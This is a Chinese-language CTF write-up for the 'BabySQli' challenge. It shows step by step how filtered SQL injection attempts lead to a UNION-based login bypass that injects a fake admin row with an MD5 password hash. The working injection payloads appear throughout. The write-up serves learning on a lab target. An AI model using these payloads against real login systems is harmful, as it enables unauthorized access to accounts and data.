MENU

[BUU GXYCTF2019] BabySQli

October 6, 2020 • Read: 117 • CTF

题目分析

这道题是一个登录框,需要输入账号密码,通过题目可以知道跟sql注入有关
尝试随便输入账号密码,123,123 ,提示wrong user!
再试试admin,123,提示wrong pass!
测试一下注入点,发现是单引号,尝试了一下 admin' or 1=1#,回复 do not hack me!
or应该是被过滤掉了,用大小写绕过试试 admin' Or 1=1#,还是被过滤了,测试了一下发现等号也被过滤了。
admin' Or 2>1#,提示wrong pass!,这里我就开始不解了,明明万能密码绕过去了,为什么还是提示密码错误,那是不是一定要密码匹配上才可以?

解题过程

1.jpg

发现search.php中有一串base32注释,解密后是
select * from user where username = '$name'
这应该是提示吧,但是感觉用万能密码能绕过去啊。既然要输入密码,那就想办法构造一个密码。
在自己的环境上测试一下

select * from user;

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
select * from user union select 1,2,3;

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | 2        | 3                                |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)

发现union可以在实际的查询结果中添加一行虚拟数据(实际上表中没有记录这串数据),那是不是就可以构造一个密码可控的admin账户呢

 select * from user union select 1,'admin','admin';

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | amdin    | admin                            |
|  2 | hehe     | 202cb962ac59075b964b07152d234b70 |
|  1 | admin    | admin                            |
+----+----------+----------------------------------+
3 rows in set (0.00 sec)

看来我的猜测没错,那构造一个可控的payload试一试
name=' union select 1,"admin","admin" %23&pw=admin,还是显示wrong pass!
密码用md5加密再试试
name=' union select 1,"admin","21232f297a57a5a743894a0e4a801fc3" %23&pw=admin
成功获得flag